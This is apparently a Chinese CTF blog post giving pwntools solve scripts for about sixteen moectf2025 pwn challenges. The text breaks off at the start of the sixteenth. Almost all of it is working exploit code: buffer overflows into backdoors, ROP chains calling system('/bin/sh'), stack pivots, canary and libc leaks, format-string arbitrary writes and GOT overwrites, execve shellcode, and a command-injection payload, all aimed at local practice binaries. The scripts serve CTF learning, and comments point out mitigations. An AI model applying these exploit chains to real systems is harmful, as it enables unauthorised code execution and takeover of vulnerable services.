0x00 粗糙地贴一份moectf2025以及newstarctf2025(至week3) pwn方向的全解。笔者已经不是新生,贴全题解也不是为了享受炸鱼快感。原本不打算发布,只是因为一些事,有一些感慨,所以发布此题解,仅仅希望能帮助到正在看的你,也权且算是笔者投身 pwn 的一次回望。 0x01 - 0x16 为 moectf2025题解,0x17及以后为 newstarctf2025 week3前的题解
# 0x01 boom
# Solve script for moectf2025 "boom" (listing restored from a collapsed page).
# The check value it has to supply is reproduced with the same libc build's
# rand(); defender note: a time-seeded PRNG is not a secret source — values
# that gate control flow must come from getrandom()/arc4random().
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 50188

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Load the same libc so ctypes' rand() sequence matches the target's build.
clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
# srand(time(0)) makes rand() reproducible within the same second; this
# presumably mirrors how the target derives its check value (inferred from the name).
clib.srand(clib.time(0))
canary = clib.random() % 114514
backdoor = 0x40127e

io.recvuntil(b'(y/n)')
io.sendline(b'y')
io.recvuntil(b'message:')
# 0x7c filler, the predicted 32-bit value, 0x10 filler, one 8-byte placeholder,
# then the backdoor address.
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)
io.interactive()
# 0x02 boom_revenge
# Solve script for moectf2025 "boom_revenge" (listing restored from a collapsed
# page).  Same idea as "boom": the check value is recomputed from a time-seeded
# rand(); defender note: see "boom" — use a CSPRNG for anything acting as a secret.
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54984

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
io = start()

# The +1 presumably compensates for the target seeding one second later than
# this script (assumption — verify if the value does not match).
seed = clib.time(0) + 1
clib.srand(seed)
canary = clib.random() % 114514
log.info("canary --> " + hex(canary))
backdoor = 0x40127e

io.recvuntil(b'(y/n)')
io.sendline(b'y')
io.recvuntil(b'message:')
# 0x7c filler, the predicted 32-bit value, 0x10 filler, one 8-byte placeholder,
# then the backdoor address.
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)
io.interactive()
# 0x03 call_it
# Solve script for moectf2025 "call_it" (listing restored from a collapsed page;
# loop extents were reconstructed from the flattened text — verify against the
# original).  Defender note: the script overwrites a stored function pointer
# with attacker-chosen addresses; mitigations are bounds-checked indices and CFI.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60044

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

menu = b'Choose your gesture: '
# Option 3 five times, each answered with "/bin/sh\0".
for _ in range(5):
    io.recvuntil(menu)
    io.sendline(b'3')
    io.recvuntil(b'?')
    io.sendline(b'/bin/sh\x00')

gift = 0x401235
call_system = 0x401228
binsh = 0x404060

# Option 6 three times (its effect is not visible from this script).
for _ in range(3):
    io.recvuntil(menu)
    io.sendline(b'6')

io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'?')
# Seven trailing bytes (0x404060 little-endian, one byte short of a full qword),
# presumably so the terminating newline completes the word — assumption.
io.sendline(p64(gift) + b'\x60\x40\x40\x00\x00\x00\x00')
io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'?')
io.sendline(p64(call_system))
io.interactive()
# 0x04 ez_u64
# Solve script for moectf2025 "ez_u64" (listing restored from a collapsed page):
# reads 8 raw bytes after the hint, decodes them as a little-endian u64 and
# echoes the number back in decimal.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 55998

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

io.recvuntil(b'hint.')
leak_data = u64(io.recv(8))
# u64() already yields an int; int() here is a no-op kept from the original.
num = int(leak_data)
# sendline() is given a str; pwntools encodes it (may emit a bytes warning).
io.sendline(str(num))
io.interactive()
# 0x05 ezlibc
# Solve script for moectf2025 "ezlibc" (listing restored from a collapsed page).
# Two stages: a printed address is used to locate the binary and re-enter main,
# then a second printed address locates libc.  Defender note: printing code
# pointers defeats ASLR/PIE; never log raw addresses to untrusted peers.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 58058

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Stage 1: the 12 hex digits after "0x" are taken as read@plt; 0x1060 is its
# offset inside the binary (hard-coded from the author's analysis).
io.recvuntil(b'0x')
read_plt_addr = int(io.recv(12), 16)
log.success(hex(read_plt_addr))
elf_base = read_plt_addr - 0x1060
log.success(hex(elf_base))
main_addr = elf_base + 0x11ce
ret = elf_base + 0x101a
payload = b'a'*0x20 + p64(read_plt_addr) + p64(ret) + p64(main_addr)
io.send(payload)

# Stage 2: the second printed value is read@libc.
io.recvuntil(b'0x')
read_addr = int(io.recv(12), 16)
log.success(hex(read_addr))
libc_base = read_addr - libc.sym['read']
log.success(hex(libc_base))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
# NOTE(review): a str needle is passed here while the other scripts pass bytes;
# pwntools accepts it (possibly with a warning) — verify on your version.
binsh = libc_base + next(libc.search('/bin/sh'))
sys = libc_base + libc.sym['system']
payload = b'a'*0x28 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(sys)
io.send(payload)
io.interactive()
# 0x06 ezpivot
# Solve script for moectf2025 "ezpivot" (listing restored from a collapsed page).
# Stages a chain in .bss with the first input, then redirects the frame there
# with the second.  Defender note: the "-1" answer suggests a signed length that
# is compared but then used unsigned (inferred) — validate lengths as size_t.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62363

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

system = elf.plt['system']
pop_rdi_ret = 0x401219
ret = 0x401219 + 1
leave_ret = 0x40120f
bss = 0x404060
# 0x100 copies of "/bin/sh\0" fill the first 0x800 bytes of the buffer, so the
# chain that follows lands at bss + 0x800.
payload = b'/bin/sh\x00'*0x100 + p64(bss) + p64(ret) + p64(pop_rdi_ret) + p64(bss) + p64(system)
io.recvuntil(b'introduction.')
io.sendline(b'-1')
io.send(payload)

payload = b'a'*0xc + p64(bss + 0x800) + p64(leave_ret)
io.recvuntil(b'number:')
io.send(payload)
io.interactive()
# 0x07 ezprotection
# Solve script for moectf2025 "ezprotection" (listing restored from a collapsed
# page).  The first write overruns the string terminator so the echo leaks the
# stack-protector value and a saved frame pointer; the second write reuses them.
# Defender note: echoing a buffer that is not NUL-terminated is the real bug —
# the canary only helps if it cannot be read back.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64058

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

orw_low = 0x128c  # unused in this script (kept from the original)
payload = b'a'*0x18 + b'b'
io.send(payload)
io.recvuntil(b'aab')
# 7 bytes follow the overwritten low byte; rjust restores the 0x00 low byte.
canary = u64(io.recv(7).rjust(0x8, b'\x00'))
log.success("canary --> " + hex(canary))
rbp = u64(io.recv(6).ljust(0x8, b'\x00'))
log.success("rbp --> " + hex(rbp))
io.recvuntil(b'bytes.')
# Only the two low bytes of the return address are replaced (0x728c).
payload = b'a'*0x18 + p64(canary) + p64(rbp) + b'\x8c' + b'\x72'
io.send(payload)
io.interactive()
# 0x08 ezshellcode
# Solve script for moectf2025 "ezshellcode" (listing restored from a collapsed
# page): assembles an execve("/bin//sh") stub and sends it after choosing
# option 4.  Defender note: this only works where user data lands in memory
# that is both writable and executable — enforce W^X (NX stack, no RWX mmap).
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62001

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# 0x68732f2f6e69622f is "/bin//sh" little-endian; 59 is execve on x86-64.
shellcode = asm('''
xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')
io.sendline(b'4')
io.recvuntil(b'set.\n')
io.send(shellcode)
io.interactive()
# 0x09 eztext
# Solve script for moectf2025 "eztext" (listing restored from a collapsed page):
# answers "100" to the length prompt, then sends 0x10 filler followed by the
# address of a function in the binary.  Defender note: a user-supplied length
# that exceeds the destination buffer is the classic fix-by-bounds-check bug.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 65306

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

sys_addr = 0x4011cd
ret = 0x40101a  # unused in this script (kept from the original)
io.recvuntil(b'?')
io.sendline(b'100')
payload = b'a'*0x10 + p64(sys_addr)
io.sendline(payload)
io.interactive()
# 0x0a find_it
# Solve script for moectf2025 "find_it" (listing restored from a collapsed page):
# pure menu interaction — option 3, the name "flag", and fd 1.  Defender note:
# letting a client pick an arbitrary file name and output descriptor is a
# path-traversal / information-disclosure primitive; allow-list both.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 53309

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

io.recvuntil(b'it?\n')
io.sendline(b'3')
io.recvuntil(b'see?\n')
io.sendline(b'flag')
io.recvuntil(b'fd?\n')
io.sendline(b'1')
io.interactive()
# 0x0b fmt
# Solve script for moectf2025 "fmt" (listing restored from a collapsed page):
# a single format string reads a string (%7$s) and a pointer-sized value
# (%10$p) back from the target.  Defender note: printf(user_input) is the bug;
# use printf("%s", user_input) and build with -Wformat-security / -Werror=format.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6_2.39-0ubuntu8_amd64/usr/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59478

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6-dbg_2.39-0ubuntu8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/glibc-source_2.39-0ubuntu8_all/usr/src/glibc/glibc-2.39
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

io.recvuntil(b'name?')
payload = b'%7$s%10$p'
io.sendline(payload)
io.recvuntil(b'Nice to meet you,')
str2 = io.recv(5)
log.success(str2)
io.recvuntil(b'0x')
# The %p value is 5 ASCII bytes packed in a word: decode the hex back to text.
hex_str = io.recv(10)
str1 = bytes.fromhex(hex_str.decode()).decode('ascii')
log.success(str1)
io.interactive()
# 0x0c fmt_S
# Solve script for moectf2025 "fmt_S" (listing restored from a collapsed page).
# The format string is evaluated repeatedly, so the script first reads a stack
# and a libc pointer, then performs a series of %hn/%hhn writes, two bytes at a
# time, each round preceded by sending p64(0).  Defender note: a format string
# the client controls inside a loop gives arbitrary write; the fix is the same
# as for any printf(user_input) — never pass user data as the format.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 56167

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b talk
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Leak round: argument 8 is a stack pointer, argument 33 a libc pointer
# (offsets are the author's, taken from debugging).
payload = b'%8$p%33$p'
io.recvuntil(b'him...')
io.sendline(payload)
io.recvuntil(b'0x')
stack_addr = int(io.recv(12), 16)
ret_addr = stack_addr - 0x18 + 0x20
i_addr = ret_addr + 0x10 - 0x20
log.success("ret_addr in stack-->" + hex(ret_addr))
log.success("i_addr in stack-->" + hex(i_addr))
io.recvuntil(b'0x')
libc_start_main = int(io.recv(12), 16) - 128
libc_base = libc_start_main - libc.sym['__libc_start_main']
log.success("libc_base-->" + hex(libc_base))
io.recvuntil(b'battle!')
io.send(p64(0))

# Every write round below: point argument 17 at a stack slot (%17$hn), then
# write a 16-bit value through argument 47 (%47$hn / %47$hhn).
payload = '%{}c'.format((i_addr & 0xffff) + 7).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format(0xff).encode() + b"%47$hhn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload = '%{}c'.format(ret_addr & 0xffff).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
backdoor = libc_base + 0xebd3f
payload = '%{}c'.format(backdoor & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((ret_addr & 0xffff) + 2).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((backdoor >> 16) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Same two-step pattern for the saved frame pointer slot, three halves.
rbp_addr = ret_addr - 0x8
payload = '%{}c'.format(rbp_addr & 0xffff).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
rbp = ret_addr + 0x80 - 0x8
payload = '%{}c'.format(rbp & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((rbp_addr & 0xffff) + 2).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((rbp >> 16) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((rbp_addr & 0xffff) + 4).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))
payload = '%{}c'.format((rbp >> 32) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.sendline(b'0')
io.interactive()
# 0x0d fmt_T
# Solve script for moectf2025 "fmt_T" (listing restored from a collapsed page).
# Leaks a libc pointer with %11$p, then writes system's address over a GOT
# entry with two %hn writes.  Defender note: Full RELRO (-z relro -z now)
# makes the GOT read-only and removes this write target entirely.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60002

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b printf
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

payload = b'%11$p'
io.send(payload)
io.recvuntil(b'0x')
# +0x30 is the author's offset from the leaked value to __libc_start_main.
libc_base = int(io.recv(12), 16) + 0x30 - libc.sym['__libc_start_main']
log.success("libc_base --> " + hex(libc_base))
system = libc_base + libc.sym['system']
target_got = elf.got['printf']
log.info("target addr --> " + hex(target_got))
log.info("printf addr --> " + hex(libc_base + libc.sym['printf']))
log.info("system addr --> " + hex(system))

payload = b'%;sh'
io.recvuntil(b'hell.\n')
io.send(payload)
# GOT address followed by 7 bytes of 0x40401a (one byte short of a qword).
payload = p64(target_got) + b'\x1a\x40\x40\x00\x00\x00\x00'
io.recvuntil(b'hell.\n')
io.send(payload)

# Two 16-bit halves; val2 is computed relative to val1 because %n counts
# cumulative output, and +0x10000 keeps it non-negative.
val1 = (system & 0xffff)
val2 = ((system >> 16) & 0xffff) - val1 + 0x10000
payload = '%{}c'.format(val1).encode() + b"%24$hn" + '%{}c'.format(val2).encode() + b"%25$hn"
io.recvuntil(b'hell.\n')
# Padded to 26 bytes, presumably the exact size the target reads — assumption.
io.send(payload.ljust(26))
io.interactive()
# 0x0e hardpivot
# Solve script for moectf2025 "hardpivot" (listing restored from a collapsed
# page).  Three sends: move the frame into .bss, leak puts via the GOT, then
# place "/bin/sh" and call system — all staged through leave;ret.  Defender
# note: a fixed, writable .bss address the client can fill is what makes the
# pivot reliable; PIE plus a bounds-checked read removes both halves.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64689

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
b vuln
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

pop_rdi_ret = 0x40119e
ret = 0x40101a
leave_ret = 0x40127b
main = 0x40127d  # unused in this script (kept from the original)
vuln = 0x401264
bss = 0x404060

io.recvuntil(b'> ')
payload = b'a'*0x40 + p64(bss + 0x1000) + p64(vuln)
io.send(payload)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
payload = p64(bss + 0x800) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln) + b'a'*0x18 + p64(bss + 0x1000 - 0x40) + p64(leave_ret)
io.send(payload)

puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success("puts_addr --> " + hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
log.success("libc_base --> " + hex(libc_base))
system = libc_base + libc.sym['system']
# "/bin/sh" is written 3 times right after the chain; binsh points into it.
binsh = bss + 0x800 - 0x8
payload = p64(bss + 0x400) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) + b'/bin/sh\x00'*3 + p64(bss + 0x800 - 0x40) + p64(leave_ret)
io.send(payload)
io.interactive()
# 0x0f inject
# Solve script for moectf2025 "inject" (listing restored from a collapsed page):
# chooses option 4 and sends a newline followed by a shell command.  Defender
# note: this is command injection — the target evidently hands client text to
# a shell; use execve() with a fixed argv and reject control characters
# (the leading "\n" terminates whatever precedes the injected text).
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52758

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

payload = b'\n' + b'cat flag -- '
io.sendline(b'4')
io.send(payload)
io.interactive()
# 0x10 no_way_to_leak
# Solve script for moectf2025 "no_way_to_leak" (listing restored from a
# collapsed page): pwntools builds a ret2dlresolve chain so no libc leak is
# needed.  Defender note: this technique relies on lazy binding; linking with
# -z now (Full RELRO) makes the dynamic resolver unreachable from a chain.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
